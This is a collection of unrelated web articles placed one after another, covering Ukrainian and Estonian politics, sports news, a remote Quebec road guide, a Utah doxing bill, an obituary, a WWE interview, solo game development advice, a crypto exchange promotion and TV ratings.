His heavy pro-Europe stance brought him early attention from Russia. Last year Russia's consumer watchdog banned imports of sweets from his Roshen chain of outlets and Russian authorities have closed down a Roshen factory in the town of Lipetsk pending an investigation into alleged malpractice there.
“DIFFICULT EXAM”
With an agreement on political association already signed with the European Union, it will be now down to the newly-elected president to agree a free trade pact with the EU bloc.
This, he hoped, would lead to “ambitious” reforms in Ukraine that would sustain a bid for membership of the EU.
“In the very near future we would ask our European partners ... for a membership perspective because the Ukrainian people have passed a very difficult and very important exam,” he said.
After Crimea's annexation by Russia, a move which the West was powerless to help Ukraine resist, Poroshenko saw a need for a new security architecture for Europe that would afford protection for non-bloc countries like Ukraine.
“The concentration of 30,000 Russian forces on Ukraine's border and the destabilization of the situation in nine (Ukrainian) regions of the east and south, have produced the most serious threat from the Russian Federation since the time of the Cold War,” he said.
The Ukrainian armed forces needed to be modernized to produce a force that was “modern, with a quick reaction ... with the ability to defend” - an area where Ukraine would look for cooperation with the EU and the United States.
Asked about association with NATO, he pointed to growing support in some parts of Ukraine for closer ties with the U.S.-led military alliance after the Russian military incursion. But he said that swell of support was not great enough to press for NATO membership and said the issue “could split the country”.
“If you are asking: what is the top priority? Is it to be in NATO or keep the unity of the country? My answer would be: keep the unity of the country,” he said.
Cooperation and dialogue with Russia would be essential in the future, he said. But on Crimea he was adamant.
Ukraine would continue to press by all international and judicial means to “retrieve our territory.” “There can be a compromise (with Russia) only after de-occupying Crimea,” he said.
The teenager has been linked with several big teams.
Reports in Russia today are linking Manchester City with one of the country's best young talents. Sport Express is reporting that Manchester City are already in contact with 19-year-old Ukrainian talent Oleksandr Zinchenko.
The report claims that City are willing to meet the activation clause in the FC Ufa player's contract and are in contact with the player's representatives about a move to The Etihad.
The report will however be a shock to Borussia Dortmund fans. It was reported by ESPN this week that the teenager's agent had claimed that he was off to the German team this week.
However, Ufa refuted that claim and it would now seem that Manchester City are the front-runners to snap the Ukrainian talent up in the summer.
Zinchenko is a former Shakhtar Donetsk youngster but he left the club for Russian side Ufa in 2015.
The teenage talent, who has one cap for the Ukrainian international team, would be a fantastic signing from City ahead of Pep Guardiola's arrival as he is an excellent young talent who could thrive under his tutelage.
The Trans-Taiga Road is a gravel road that runs 666 km east from near the top end of the James Bay Road. It was built to access the various dams and generating stations that extend upriver along the La Grande River. This is an extremely remote road, leading 666 km east - almost to Labrador - with no settlements or towns aside from Hydro Quebec's settlements for workers (not open to the public). At the far end you will be 745 km from the nearest town! This is the farthest you can get from a town on a road in North America! (Not counting the private Hydro Quebec towns that are not open to the public). Along this road is also the farthest north point you can travel on a road in eastern Canada. The road from Brisay (km 582) to Caniapiscau is rougher and a 4-wheel drive vehicle is recommended by Hydro Quebec. The main reason for this is the very coarse gravel used for this road - there are large rocks littering the road surface. However, I have heard from people who have driven this road in ordinary passenger cars and they say it is fine. You do have to keep your eyes open for the larger rocks though. You should definitely travel this road only in a reliable vehicle with good tires. It is not an overly rough road; passenger vehicles can drive it, but it is gravel. Vehicle breakdowns here can be very costly. Flat tires can be a serious (and expensive) incident if your tires are damaged. You could be looking at having tires flown in on a non-scheduled flight - there are no convenient "tire stores" up here! Please read Driving the Trans-Taiga Road first. Although there are no towns, there are a couple of outfitters along the way that sell fuel and offer meals and lodging. Cell phones do not work here. Generally the scenery is fairly level, but this road is definitely more interesting than the James Bay Road. For most of the length it runs through taiga: spruce and jack pine forest, bogs, rocks, and low hills. This is about all you'll see apart from birds and some wildlife, the occasional cabin a short distance off the road, and Hydro Quebec installations. I once saw a couple of wolves playing in the middle of this road. This truly is a *VERY* remote road. Do not approach a trip along it lightly.
Please read Driving the Trans-Taiga Road before traveling this road.
Utah's proposed doxing ban too broad, says EFF
A Utah State House of Representatives bill would outlaw doxing—publishing someone's private info with the intent to facilitate harassment—but the EFF says the planned law's language is so broad it would target free speech.
At fault, Sam Machkovech reports, is the fact that the law doesn't clearly define its terms.
[Lead sponsor State Representative David E.] Lifferth's suggested amendment, on the other hand, offers no such specific, harassment-minded qualifiers in regard to "personal identifying information." The legislation as written would punish citizens for posting a laundry list of information about anyone if a court determined there was intent to annoy, alarm, or offend them, including names, birthdays, phone numbers, place of employment, photographs, or other realistic likenesses. The penalty for first-time offenders would be a class B misdemeanor, punishable by up to six months in jail and a maximum $1,000 fine. Among other things, such legislation might limit citizens' ability to hold public officials and other influential members of society accountable for their actions.
Lifferth has promised to fix the bill's language.
From: Army TimesA 26-year member of the Texas Army National Guard died after rescuing his children from a riptide on Memorial Day.Sgt. 1st Class Joseph Ros, with Headquarters and Headquarters Company, 386th Engineer Battalion, began his career in uniform in 1989 and served with several engineering units, according to a Thursday news release from Texas' 176th Engineer Brigade.Three of Ros' children and another child were being pulled under by the current at Matagorda Beach on Monday when Ros and another rescuer leaped into the water to save them, Matagorda County Sheriff's Department Sgt. James Orr said Friday. The children were brought back to shore safely, but Ros didn't make it out of the water under his own power.Three other rescuers, including a police officer, pulled an unconscious Ros ashore, according to a news release from the sheriff's office. Despite receiving CPR on the scene until emergency medical services arrived, Ros didn't survive.Ros deployed to Iraq in late 2004 and had volunteered to return to full-time duty in recent days to support flood-relief missions in his home state."For many of us, he was more than a mentor," Warrant Officer Joey Rodriguez, with the 386th, said in the release. "He was more like a brother to me. He pushed me to do better for myself. He is the main reason I became a warrant officer."Ros held multiple jobs in education, including as a special-needs teacher, a middle school principal and, most recently, as director of maintenance and transportation for Van Vleck Independent School District.He is survived by his wife and four children. A memorial service was scheduled for Friday afternoon."He loved his wife, three boys and little girl so much; nothing was going to come between his love for them," Staff Sgt. Nelson Zepeda, with the 386th, said in the release.The Joe Ros Memorial Fund has been established through Prosperity Bank; for donation information, call [login to see] or email [login to see] .
Carlton has taken Western Australian on-baller Zac Fisher with pick No.27 in the 2016 national draft.
After an outstanding season in the midfield for the Perth Demons, the 18-year-old quickly shot up the draft order, making him a true top-30 contender.
Averaging 21 disposals in four games during the U18 Championships, as well as ranking seventh overall for clearances in the division one carnival, Fisher's clean hands and quick thinking around the contest was constantly on show.
Although he only stands at 175cm, his height has never stopped him racking up possessions and going in hard at every contest. His ability to keep the ball moving forward is a key part of his game.
Welcome to the Blues, Zac Fisher! The small forward becomes our second selection from WA, taken at No.27. #CarltonDraft #BoundByBlue pic.twitter.com/WXdZykGPJd — Carlton FC (@CarltonFC) November 25, 2016
Carlton's General Manager of List Management and Strategy Stephen Silvagni says Fisher will be a handy addition to the Blues midfield.
“Zac is very creative by hands – which is very beneficial playing in the midfield – and he has a terrific left field kick,” Silvagni said.
“Although he would be considered a small midfielder, he's proven himself against men playing seniors over in WA – we can't wait to see him develop at AFL level.”
Welcome, Zac!
STATS:
DOB: 15.06.1998
Position: Midfielder
Height: 175cm
Weight: 61kg
Club: Perth/Western Australia
THEY SAID IT:
"Looking at a person like Caleb Daniel, he holds his own in the AFL and is having a really good season – it does give me a bit of hope. My goal at the start of the year was just to make 18s and it was a pretty far-fetched goal. I wasn't even thinking about getting picked up or anything like that. Now I'm definitely thinking about it but I kind of don't want to get ahead of myself.”
- Fisher chats to The Western Australian in April this year about his goals for the season.
As evidenced by the thunderous chants of “How are you doin'?” that echoed through Dallas, the WWE Universe was thrilled to see Enzo Amore & Colin Cassady make their Raw debut just one night after WrestleMania. However, longtime fans of The Realest Guys in the Room were slightly disappointed that Carmella, the team's bombshell manager, was not at their side.
With Enzo & Cass trash-talking The Dudley Boyz and brawling their way through the No. 1 Contenders' Tournament to hopefully earn a WWE Tag Team Title opportunity, fans still have one lingering question: Where's Carmella? To get the answer, WWE.com went straight to The Princess of Staten Island. We got her thoughts on Amore & Cassady's big move and what it means to her future in NXT.
Carmella's WWE.com profile | Follow The Princess of Staten Island on Twitter
WWE.COM: What were you feeling when you saw Enzo and Cass debut on Raw the night after WrestleMania?
CARMELLA: Pure excitement. I'm so proud of them. Seeing them out there, they looked like stars. They looked like they belong there. It was really exciting to see.
WWE.COM: Having spent so much time with them in NXT, how do you think Enzo & Cass will do on Raw and SmackDown?
CARMELLA: I think they're going to kill it. I might be a little biased, but they were the most popular team in NXT. They had crowds hanging on every word they said. I know it will translate really well on Raw and SmackDown. The WWE Universe is going to love them. It's new and exciting, so I can't wait to see them succeed!
WWE.COM: They've been getting right into it with WWE's most experienced tag team, The Dudley Boyz. Do you think they're biting off a little more than they can chew at the start?
CARMELLA: Well, The Dudleys have been around for a long time. It will be interesting to see Enzo & Cass against them, but I don't think that there's going to be any issue with my boys going out there and dominating. I'm excited to see them battle.
WWE.COM: Some of the passionate members of the NXT Universe were a little disappointed that you weren't out there with Enzo & Big Cass on Raw. How do you feel about not being with them?
CARMELLA: My entire NXT career has been alongside Cass & Enzo. Of course, it would have been nice to be out there and relish in the moment of their debut on the night after WrestleMania with them. But, I'm here to be a Superstar and an in-ring performer. I've been training for over two years in the ring now. A lot of the fans don't necessarily get to see what I can do, because they've seen me as the hype girl for Cass & Enzo.
I'm here to compete at a higher level. I want to be NXT Women's Champion. Unfortunately, I can't do everything. I can't be with them and take over the NXT Women's division at the same time. Of course, it's a little sad to not be with them, but it's a super-exciting time for me to break out on my own.
Carmella, the No. 1 contender to the NXT Women's Championship, faces stiff competition in the form of Emma, but also has to keep a close eye on Dana Brooke. Video courtesy of the award-winning WWE Network.
WWE.COM: Are you ready to go it alone?
CARMELLA: Of course. It's a great opportunity for me. It's really exciting to be a part of the Women's division here in NXT. Now that my focus isn't with Cass & Enzo, it's on me. I can show the NXT Universe what I've been working on in the ring over the last two years. It's my time to shine and get the NXT Women's Championship.
WWE.COM: There's been a big change in the division recently, with Asuka taking the NXT Women's Title from your best friend, Bayley. How do you think that affects the division going forward?
CARMELLA: It's exciting. Bayley was an incredible champion. As my best friend, I'm so supportive of her and I wanted to see her retain the title at TakeOver: Dallas. However, Asuka is a force to be reckoned with. She made a statement from the moment she debuted in NXT. It changes everything. There's no one like her in NXT, with her hard strikes and submissions. She's going to make everyone step up their game. I'm ready and willing to do just that.
WWE.COM: What can the NXT Universe expect to see from you in the weeks ahead?
CARMELLA: They'll see a big change in me. My focus is just on me and on becoming NXT Women's Champion. I don't have to worry about what my boys are doing now. I support them and I'm so excited to see their success. But now, everyone gets to see Carmella and who she really is. I'm not just the hype girl.
As Duke players ran off the court Thursday night after their diligent 74-66 victory against No. 15 Florida State, they hugged one another and clapped giddily.
Article continues below ...
They celebrated in part because the triumph before 12,100 upset-minded fans at the Donald L. Tucker Center avenged a heartbreaking home loss to the Seminoles on a 3-pointer at the buzzer last month, but it had much greater implications.
Because in a peculiar season for the Blue Devils that has featured a rare pair of home losses, an undefeated conference road record and a blowout loss at then second-ranked Ohio State, coach Mike Krzyzewski has his fifth-ranked team in a position it has been many times in the past. It is tied for first place in the Atlantic Coast Conference and in control of its own destiny to win the league's regular-season title with three games left.
With five straight wins, Duke has propelled itself back into the conversation for a possible No. 1 seed in the NCAA tournament, a seemingly impossible feat until standout freshman guard Austin Rivers' clutch, last-second 3-pointer stunned North Carolina just more than two weeks ago and started his team's improbable streak.
“It's been kind of an up-and-down season,” said Rivers, who had 20 points on Thursday night. “But we've stayed poised throughout it. We're just starting to come together.”
Although Duke (24-4, 11-2 ACC) led throughout except for a few times in the game's first 10 minutes, Florida State (19-8, 10-3) twice pulled to within three points late, once with 4:56 left in the game and 39 seconds later. But both times Duke answered on the ensuing possession with a 3-pointer.
The Blue Devils were 13 of 28 from 3-point range, which included a 6-of-9 effort by junior guard Andre Dawkins, who finished with a game-high 22 points off the bench. He had five clutch 3s in the first half that were key to his team's 39-32 halftime lead.
“Our 3-point shooting was probably the difference in the game,” Krzyzewski said.
A 3-pointer also seems to be the difference in Duke's season. Rivers and his teammates credit Rivers' game-winning shot to beat North Carolina on the road on Feb. 8 for their improved play as of late.
“No one thought we were going to win that game,” senior forward Miles Plumlee said. “It gave us a new sense of confidence. We're just playing with that every game now.”
Since the North Carolina victory, Rivers said he and his teammates have bought into playing as a team. Now, they know one another's spots on the floor, make the extra pass for open shots and even help one another up after falling to the floor, he said.
“We are a team now,” Rivers said. “We've just got to keep it going.”
Not that Rivers and Co. have forgotten their struggles before his North Carolina heroics, which averted what would have been a devastating two-game losing streak. Even before the season, they heard the whispers about losing three NBA draft picks from last year's team and not returning a single player who averaged double digits in points.
“There were a lot of question marks,” said Plumlee, who had 10 points and eight rebounds. “A lot of new guys. New roles. A large freshmen class. People doubted us.”
Rivers acknowledged that Duke's critics have been “rough” on him and his teammates at times this season, but he insisted they have never lost confidence in themselves.
“People are demanding of Duke,” Rivers said. “Everybody's, ‘Duke's supposed to be the greatest. Duke, Duke, Duke.' But now we're right there. We've got to keep it up, but we're not really worried about the expectations. We're just worried about our team expectations for us and that's to win.”
The X factor for just how far Duke goes the rest of this season could be Dawkins, who entered the game shooting 40.7 percent on 3s and averaging 9.4 points per game. He now has hit five 3-pointers or more in four games this season and was twice fouled on 3-point attempts Thursday night.
“'Dre is one of the best shooters I've ever seen,” Plumlee said. “When he comes ready like that, it gives our team a whole new feel.”
Dawkins hitting 3s keeps defenders from double-teaming Plumlee and his brother, Mason, a junior forward. It also opens up the floor for Rivers, who entered Thursday night averaging a team-best 15 points per game.
“It makes it a lot easier on me because if he's not, they're just cramped in the paint waiting for me,” Rivers said.
By the time Duke players got back to their locker room Thursday night, it was as if their brief celebration as they ran off the court had never happened. A focused Rivers reminded a reporter that the Blue Devils' next game Saturday at home against Virginia Tech was just 36 hours away.
In addition to the Hokies, Duke also will be favored at Wake Forest before it closes the regular season on March 3 with a home game against rival North Carolina, which is also tied for first in the ACC — a matchup that likely will determine the league's regular season champion.
“Things are working out for us,” Rivers said. “It's going to work.”
And if Duke continues to play like recently, there will be plenty more celebrations. Just don't rule out more of the unexpected from these Blue Devils.
As president of a small Baltic republic that was occupied by the Soviet Union for more than four decades, Estonia's Toomas Hendrik Ilves is all too familiar with the way Russia has treated its neighbors. For years he's warned about the revanchist agenda and aggressive behavior of Russian President Vladimir Putin. And now that the world has seen the Kremlin's reckless, ruthless actions in Ukraine and Crimea, influential leaders in the respectable salons of Washington, Brussels and other European capitals are starting to pay attention. Or, at least, they should be.
What's most threatening about Russia's behavior, in Ilves's view, is that “the old rules don't apply.” But it should not have taken the invasion of Crimea to get that message across. The Helsinki Accords of 1975 were supposed to have established the territorial integrity of European nations, he says, and since Russia's 2008 invasion of Georgia it's been clear that Putin would just ignore them when he saw fit.
The sanctions announced thus far by the United States and the European Union aren't likely to do the job, Ilves told me last weekend on the sidelines of the Brussels Forum, a conference sponsored by the German Marshall Fund. The current measures threaten visa restrictions and asset freezes against Putin's cronies, but the mood in Moscow is such that most of those on the list see having their names there as “a badge of honor,” says Ilves.
So, where should the West focus its attention?
Ilves' eyes light up and he repeats one word: “Banks,” he says. “Banks.” The American sanctions have targeted one financial institution so far, Bank Rossiya, described by the U.S. as “the personal bank for senior officials.” But such measures could go much further. After the 9/11 terrorist attacks, the United States developed a complex and stringent system for applying economic sanctions to target terrorist funding. Ilves would like to see the same sort of tools deployed against many of the banks doing business with the Russian government and Putin's cronies.
Ilves also raises the idea of reviewing Europe's recognition of Russian passports as “trustworthy travel documents.” A key element of Moscow's game plan in the territories it wants to take is “passportization,” the cynical—not to mention illegal—distribution of Russian passports to citizens of other countries. That's what it did in the Georgian territories of Abkhazia and South Ossetia in the run-up to the 2008 War. Earlier this month it did the same thing in Crimea. “If it were some other country that was a passport mill, there would be a reaction to that,” says Ilves.
Without getting into specifics, Ilves says EU countries should “review” their entire approach to dealing with Russian passports. “This document is now being thrown all over the place, to everybody, it means nothing, and therefore we have to cease—until we come up with a new policy—recognizing this as a legitimate travel document.”
Yet Ilves is worried that his fellow Europeans may not be up to the task. “Robert Kagan was completely off when he said Americans are from Mars, Europeans from Venus,” Ilves said, referring to Kagan's widely discussed 2003 book, Of Paradise and Power, which postulated that the continent had adopted a post-martial worldview. “Europeans are from Pluto.” Ilves, whose family history straddles both continents, is trying to bridge that gap.
Estonia, along with the other Baltic republics of Latvia and Lithuania, has obvious reason to fear Russian designs on its own territory. A quarter of the country's 1.3 million people are Russian-speakers, and in light of Putin's declared policy reserving Russia's unilateral right to “protect” Russians abroad—its pretext for the Crimea operation—some fear that the Baltics may be next.
Estonia has had problems integrating its ethnic Russian population, and a 2007 riot over the government's relocation of a Soviet-era war statue was just the sort of incident that the Kremlin might take advantage of to stir discord (a nationwide cyberattack followed, which the Estonian government blamed on Moscow). Language rights have been a persistent flashpoint, since state employees are required to speak Estonian. Earlier this month, a Russian diplomat delivered a speech at the United Nations Human Rights Council in Geneva asserting that, “language should not be used to segregate and isolate groups,” and Russia was “concerned by steps taken in this regard in Estonia as well as in Ukraine.” To Baltic ears, that's an ominous sounding remark.
But Ilves doesn't think Moscow will have much luck on that front. Ethnic Russians in Estonia, Ilves says, live far better, freer lives than Russians living in Russia. “If you want to not have the euro, not get the real rule of law, have free movement of labor to Siberia, and stand in line to get a visa for the EU, I guess that's an option for somebody, but it's not really a problem,” he scoffs, with typically wry humor. Tallinn, he boasts, is a favorite destination for liberal Russians seeking escape from their more authoritarian society.
Ilves himself is something of a poster-boy for Estonia as a modern, cosmopolitan European country with global connections, and he's easy to pick out in a crowd, since he's usually seen at public events sporting a bow tie. Born in Sweden to Estonian refugees, he was raised in New Jersey and graduated from Columbia University. He earned his stripes as a Cold Warrior when he was the head of the Estonia desk at Radio Free Europe. After Estonia regained its independence from the Soviet Union in 1991, he became Estonia's ambassador to the United States, and thereafter launched a career in Estonian politics. Active and popular on Twitter, he embodies his country's reputation for being tech-savvy.
Indeed, in 2012, Ilves got into a high profile, rough-and-tumble Twitter spat with New York Times columnist Paul Krugman, who mocked Estonia's austerity measures, which the country had undertaken in response to the worldwide financial crisis. “Let's write about something we know nothing about & be smug, overbearing & patronizing: after all, they're just wogs,” Ilves began, unleashing a string of biting and witty responses.
Estonia may be small, but it's proud and has ambitions in the global economy. It is one of only four NATO members which actually spends 2 per cent or more of its GDP on defense, the minimum suggested by the military alliance. Estonia, the land where Skype was invented, produces more tech start-ups per capita than any other country in Europe. The hashtag #estonianmafia is playfully used to characterize the disproportionate presence of Estonians in the world of high-tech.
Estonia also has diversified its energy supply so as to become less dependent on Russia, thus serving as a model for the rest of Europe. While Estonia receives 100 percent of its natural gas from Russia, this accounts for less than 15 percent of the country's total energy use. For years, Ilves has been one of the loudest voices warning the West to reduce its energy dependence on Moscow. When U.S. Vice President Joe Biden President Ilves in Warsaw last week in a show of support for Eastern European countries feeling threatened by the Russian invasion of Ukraine, Ilves urged him to seek changes to a U.S. law limiting gas exports to the continent. One hopes this advice, along with much else about Russia, will be taken more seriously now in Western capitals.
Many Americans, witnessing a world of tumult and weary of two long wars, may not understand why they should concern themselves with quarrels in far away countries about which most know little. For them, Ilves has stern council: “If you break the kind of rules that were just broken,” he says, “you're going to find yourself in a very big war somewhere.”
Quick: name all of the skinny starting power forwards in the league. OK, I'll give you another minute. Maybe LaMarcus Aldridge? And even he has 20 pounds on Taj Gibson.
So it begs the question: will Taj Gibson ever be a starter in the NBA? Or will he merely be an energy guy? You need those too, to be sure.
Maybe the Bulls aren't concerned about his label, or whether he starts or comes off the bench. What they are concerned about is finding good defenders who can run opponents off the floor with Derrick Rose. Tyrus can do it. Even Joakim can do it now. Gibson is another shot-blocking big that can run all day.
I'm starting to come around on this pick. And as much as every Bulls fan wants someone that can score down low and with their back to the basket, you didn't see those available in the draft.
Gibson can be an important rotation piece for years to come. And if the Bulls ever do trade Tyrus, they have something similar right behind him. Same goes for James Johnson and Deng. The Bulls did get better in the draft. And they added to their options.
Conventional wisdom states that solo developers should not make big games. Leave that for the more experienced teams ... I say no. Here are some guidelines on how to approach an ambitious game project all by yourself.
Posted by MKSchmidt on Oct 20th, 2017 - Intermediate Other
The Big Idea: Guidelines on How to Complete an Ambitious Project
by Michael Klaus Schmidt
The Big Idea
A few years ago, I had a game idea that seemed too big and too ambitious for a single developer to actually complete. However, I was so passionate about the project, that I shrugged off my concerns and dove in to start development. I knew it would take long, but I had worked on other projects, whether game related or not, for long periods, and I believed I could handle it if I paced myself. Was I a heroic game designer? Or a fool who took on too much?
The Risks of a Big Project
The risk with a big project, especially for a single person without a team, is that the project may soon overwhelm you if you have no other people to fall back on. With a solo developer handling design, programming, art, sounds and even play-testing, debugging and marketing of a game, it can easily take up too much time and energy, causing you to fall into inaction. Inaction, obviously will stop the project from moving forward, and then despair can set in. This can kill the project and cause all sorts of self-discussions about whether trying to design games is even worth the effort.
Outer space is an interesting place. On of my goals was to have my game generate unique nebulas. The script I made to do this actually led me to create a whole different game.
Having done this, and having completed two games – well nearly completed in the case of one of them – I feel like I have gained some insights into this issue. Reflecting on my experiences: things that worked, things that didn't, I felt like I had a set of guidelines by which anyone might complete a project that might seem too large for an individual to handle alone.
Start Small
I know, we're talking about doing a big project, right? So why would I want to start small? Well, that's my first piece of advice. Start your big project by making a small one. Even if you've already started the big one, step back, and make a small game from start to finish. Get it play tested, fix all the bugs, and publish it on Steam, or the Play Store, or wherever you feel comfortable publishing your game. Give it an appropriate price, free if necessary, but make sure you go through the whole process. Create artwork for marketing the game, a trailer, maybe a short tutorial if the gameplay is at all complex. These are all things you will be doing on your big game, so it is really a good idea to know what to expect.
UPDATE: I learned recently about a thing called the inverse pyramid approach. This idea visualizes your game as a large pyramid, with the pointy part on the bottom. Imagine taking slices of this pyramid. The bottom would simply be a smaller pyramid. In this way, you would develop a complete version of the game, that is limited in scope. For instance, if you are developing an adventure game with exploration, combat, trading etc... you could start by making just the combat portion. It would be a complete game in that you would create it, and release it to players as a simple combat game. Later, you can use this smaller game in the creation of your big game. If you program it carefully, it can simply plug into your game, yet be fully playable as a stand alone mini-game. If you approach all the various parts of your game like this, even if you run out of time or budget, you will still have a complete game at the end of it, even if it is not the full game you imagined.
If you've already done a small game, and gone through all these steps, then great, you should be ready for your big idea. But you will still have to keep a number of things in mind before you dive in.
Check out "Anomalies," which was originally based on my nebula creation script. I followed this idea of random shape generation, and later included movement and sounds as well. Read more about it here Indiedb.com
Make a Design Document
Design Documents are for big AAA game companies right? Wrong. You will want to make one, and you will want to put down all your ideas, in writing, before you start designing spaceships, and bosses and whatever it is you have in mind for your game.
Template documents can be downloaded if you want to see what other people have in mind when they make their games, it might be a good idea to check some of those out. However, the main idea is to document everything you want in your game, and to approximate how you are going to make it.
Most people would use a word processing program to create their design document. I like to sketch out ideas, and tend to prefer a looser structure, so I use graph paper. To each their own.
This is not about writing code on paper before committing it to your script editor. This is much more high level. Write the game's primary story-line. Write about whom the main character is, what he can do, what he can't do. What are the challenges? Who are the enemies? What do the levels look like? Whatever it is that your game is about, write it down and think about what it will take to make that part of the game work. Some things at this stage may seem too hard … well break it up into smaller tasks.
A large part of game design is simply figuring out how something is going to work. Do that in your design document, because you don't want to be making those decisions while you're coding.
Once you have a clear idea on what you want the game to be like, and details of the individual pieces that will be used to build your game, you will be ready to start making it.
Part of your design document may include images like this. If you are an artist, you will want to have a sketchbook or some way to capture your ideas quickly. For 3D modeling, it's always helpful to have 2D references. Even a quick sketch like this can help tremendously when you are making a 3D model.
Marketing
Don't make my mistake. Don't think about marketing your game after you've got it up and running. Think about marketing before you start coding. If you have any hopes of eventually selling your game, or getting people to actually play it, then the sooner you think about marketing, the better.
In my experience, if you think your game is so unique that no one else will ever come up with it … you're wrong. People come up with similar game ideas all the time. It's part of the creative process. You see what is out there, you imagine some new combination of those things, and you get an idea. Everyone has access to what is already out there, it makes sense that other people will come up with the same, or similar combinations.
Make a web page. Make a blog. Post about it on Social Media. Get people excited about your idea, and get their feedback too. The earlier you include other people into your design process, the more people you will be able to reach once the game is ready to be played. Also, you will be linking the game idea to you, even if it's not finished. That way, even if another developer comes along with a similar idea, you will have a public record of your game before they come along.
I would not recommend taking out ads for your game before it's released. Advertising is only a small portion of what constitutes marketing. If you do a good job getting your game out there, you may not need to advertise it at all.
Also, remember, there is no better marketing than having the game show up in the place people buy games. My experience is with Steam. Once you release a game on Steam, those first few days are critical. People will be seeing the game show up on their screens. Make sure the images you make are eye-catching, and more important, make sure the game is well tested, stable and really polished. Nothing will sell your game better than players who love playing it!
My big game is currently in Early Access on Steam. If I could do it over, I would have made sure it was more streamlined before I ever released it. However Steam does not give you your full visibility until you do a full release, so there is still hope.
Modeling is just one small aspect of game design. Here you can see how a quick sketch was used in creating a more detailed model. Similarly, your design document keeps track of basic ideas, that you will eventually convert into the game itself.
Scaling Back while Keeping Essentials
We all have great ideas. Every game developer has buckets full of ideas. Ideas are the meat and potatoes of game design, but you also need to be able to implement them in order for them to work. Scaling back is to know when to drop an idea that does not serve the game's main purpose. I had lots of ideas that sounded great, but they did not further my game's purpose of space exploration and discovery.
An example is the mothership. In the game, the player can visit a mothership, where goods can be traded and quests can be assigned. My idea was to create a huge mothership interior that the player could walk through, visiting shops and other characters. I still love this idea, and eventually I would really like to add it to my game, but it would have taken a lot of time. That time might be better spent finishing off the main game mechanics, and developing the exploration aspect further.
Instead, I allowed all the player's interactions with the mothership to happen through a menu whenever the mothership was near. This allowed all the required things to happen, i.e. quests, trading, etc... without any of the extra time modeling and designing this massive ship interior. Doing that well may have taken months. Making the simple menu took only a couple days.
Yes, I still think about the mothership interior, but the game is not quite finished, and I have to focus on those essentials that make the game playable and fun. For now the mothership will have to wait, and the menu will have to do it's job.
These are the kinds of sacrifices that may have to be made for a lone developer to complete a project.
Be sure that you are not cutting down on the essentials. Essentials are those things that you wanted your game to do in the first place. Exploration was an essential for me. So, while I could have decided to cut out landing on planets in order to save time – and it would have, believe me – it would have taken away the main point of the game, which was to be able to land on and explore planets.
Landing on planets like this super-heated desert world is essential to my game. Ask yourself what you can't do without. It may help you to determine what can be left out of the game, saving you precious time and energy better spent on those main features.
What is essential, and what is superfluous? These are questions only you, the game developer, can answer about your own game. But be prepared to cut some ideas in order to make sure the important ones get the attention they deserve. You can always go back and add a new feature once the game is finished. Then you have the option to provide that new feature in an update or DLC package.
Slow and Steady
A major part of finishing a big project is to work slowly and steadily. One habit that I fell into in the beginning was that, when I wanted to, I would spend hours and hours working, but when that feeling went away, I would revert to doing nothing. I knew early on that this had to stop.
Instead, I set up a system by which I would work a moderate amount, an amount I knew I could handle on a daily basis. On occasion, I would still find those moments of high energy, and be able to make great progress in a short period of time. However, at the low points, I knew if I just finished one little task a day, I would be able to keep the ball rolling, preventing inaction, and cutting despair off at its root.
Also, connected with this concept is the fact that a big game will take a long time. Be ready for this. If you've never worked on a big project before, be prepared to get bored of it. Be prepared to have other great ideas, and be prepared to say no to those ideas, if, that is, you ever want to finish your big one.
Slow, steady determination can help you build the project you have in mind. Be prepared to take your time. Don't skimp on essentials, and don't invest in things that are superfluous.
Conclusion
These guidelines can be used by anyone, for any project, at any time. However, I learned them by working on games. Games tend to involve so many different disciplines, that I think they may have more tendency to wear people out, but it really depends on the person and how they work.
I said the guidelines were for big project ideas, but these ideas can be scaled to pretty much any game, platform or project of any size. My games are Windows based, but these ideas could apply to any platform. If you have an idea for a small game, you can still benefit from deciding what is essential to the game, and cutting out things that are not. This could be especially helpful if you have a time limit for your project.
If you, like many solo game developers, are struggling to finish projects, or keep them alive, consider these guidelines and see if they might help you get back on the right path.
Check out my current, ambitious galaxy simulation/game Star Explorers here: Indiedb.com
The circle on the left says "Such beautiful dreams." The circle on the right says "Such horrible nightmares."The trickiest things for translating in this are in the nightmares circle. The only thing I see in the dreams circle that could be confusing are the lines on the "m", but in the nightmares circle, there are several tricky things. The "s" arc does cross the exact bottom making it the first letter even though it looks like it could be last. The dots for the "ch" could be confused to belong to the "s" (context rules that out because it already has three lines). The "o" on the "h" is really big. The "i" is also big. The "n" is also not clearly the first letter of the "nightmares", but it still technically is (for the same reasons as the first "s") then finally, one of the "s" lines is really friggen huge. Read carefully and you should be fine... I think that just about covers everything questionable...When drawing this, I started this with a mirror image of the word circles, then added the details. So they are meant to look similar since dreams and nightmares are basically the same thing. I also tried to make the dreams circle look bubblier with the dot chains and curved lines while I made the points and straight lines make the nightmares circle look harsher. I love it when I can make the look of the words reflect their meaningit makes makes me feel special :3Edit: Teehee... my boyfriend kindly pointed out how this looks like a bra...
DBC Rewards $200,000 in Deposit Bonus! DeepBrain Chain Deposits Open December 23
This post is also available in: 简体中文 (Chinese (Simplified))
KuCoin End Of Year Carnival! DBC Awards $200,000 Deposit Bonus!
Deposits for DBC will be open when the promotion starts at 00:00 UTC+8 Dec 23rd 2017
Timeframe: Dec 23rd, 2017 00:00 to Dec 27th, 2017 11:59 (UTC+8)
During this period, users will automatically join the following activities based on the net deposit amount of BTC or ETH (deposit amount minus withdrawal amount):
Deposit 0.05 BTC or 1.5 ETH or 15 NEO and get 60 DBC
Deposit 0.25 BTC or 7.5 ETH or 75 NEO and get 200 DBC
*KuCoin is going to calculate users' net deposit amount after the activity ends and send the awards to user accounts within 3 working days.
Deposit DBC And Get NEO Rewards!
Timeframe: Dec 23rd, 2017 00:00 to Dec 27th, 2017 11:59 (UTC+8)
During this period, users will get the corresponding NEO based on the net DBC deposit amount ranking (deposit amount minus withdrawal amount).
Ranking Number of Participants Awards Proportion Per Capita Awards Amount (NEO) 1 1 15% 300 2 1 10% 200 3 1 5% 100 4 1 3% 60 5 1 2% 40 6-10 5 8% 32 11-20 10 15% 30 21-50 30 20% 13 51-100 50 22% 8
*In association with DeepBrain chain community, KuCoin offers 2000 NEO as rewards.
*KuCoin is going to calculate users' net deposit amount after the activity ends and send the awards to user accounts within 3 working days.
ABC rookie drama “Resurrection,” which impressed in its premiere last Sunday, has grown its total-viewer number to 17 million thanks to early DVR playback.
According to Nielsen Live + 3 data, which incorporates same-night viewing and time-shifting done from Monday through Wednesday of last week, “Resurrection” grew by 22% — from 13.9 million to about 17 million. While not a particularly large percentage gain for three days, 17 million viewers is a number that few drama premieres achieve these days.
